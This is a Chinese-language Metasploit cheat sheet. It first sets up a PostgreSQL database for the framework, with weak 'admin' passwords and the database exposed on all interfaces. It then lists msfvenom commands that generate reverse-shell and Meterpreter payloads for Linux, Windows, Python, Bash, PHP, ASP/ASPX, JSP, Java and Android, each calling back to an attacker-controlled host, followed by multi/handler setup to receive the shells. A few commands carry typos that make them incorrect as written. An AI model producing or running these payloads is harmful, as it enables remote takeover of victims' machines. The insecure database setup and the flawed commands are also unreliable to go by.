99

0x00 Metasploit连接数据库

启动数据库

service postgresql start

查看是否启动成功

service postgresql status

进入postgresql配置

sudo -u postgrs psql

配置数据库密码(root)
alter user postgres password 'admin'

退出数据库
\q

修改数据库配置

进入以下目录
cd /etc/postgresql/10/main

打开配置文件
vim(leafpad) postgresql.conf

修改
listen_addresses = '*'
password_encryption = md5
保存退出

在pg_hba.conf文件最后添加一条数据

host    all all     0.0.0.0/24       md5

重启数据库服务

service postgresql restart

连接数据库

psql -U postgres -h 127.0.0.1

创建数据库

输入以下命令连接数据库

create user msf with password 'admin' createdb;
create database msf with owner=msf;

打开metasploit

命令:msfconsole
查看连接:db_status
连接数据库:db_connect msf:admin@127.0.0.1/msf
格式:
msf:数据库名
admin:密码
@:固定格式
127.0.0.1:登录地址

配置自动登录

cd /usr/share/metasploit-framework/config
leafpad database.yml

修改:
database:msf
username:msf

重启
service postgresql restart

0x01 MSF生成shell

Linux反弹Meterpreter Shell

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=4444 -f elf -o shell.elf

生成windows反弹shell(C Shellcode)

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.2.146 LPORT=4444 -f exe >test.exe

生成Python反弹shell

msfvenom -p cmd/unix/reverse_python LHOST=127.0.0.1 LPORT=443 -o shell.py

生成Asp反弹shell

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.2.146 LPORT=1234 -f asp > shell.asp

生成Bash反弹shell

msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -o shell.sh

生成php反弹shell

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.2.146 LPORT=1234 -f raw >text.php

生成java反弹shell

msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.2.146 LPORT=1234 W >text.jar

生成jsp反弹shell

msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.2.146 LPORT=1234 -f raw > shell.jsp

生成aspx反弹shell

msfvenom -a x86 --platform win -p windows/meterpreter/reverse_tcp LHOST= 192.168.1.109 LPORT=7788 -f aspx x> /home/niexinming/back.aspx

生成安卓反弹shell

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.2.146 LPORT=1234 R >text.apk

获取反弹回来的shell,进入msf

选择模块
use exploit/multi/handler

设置
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.1
set lport 4444
set ExirOnSession flase
exploit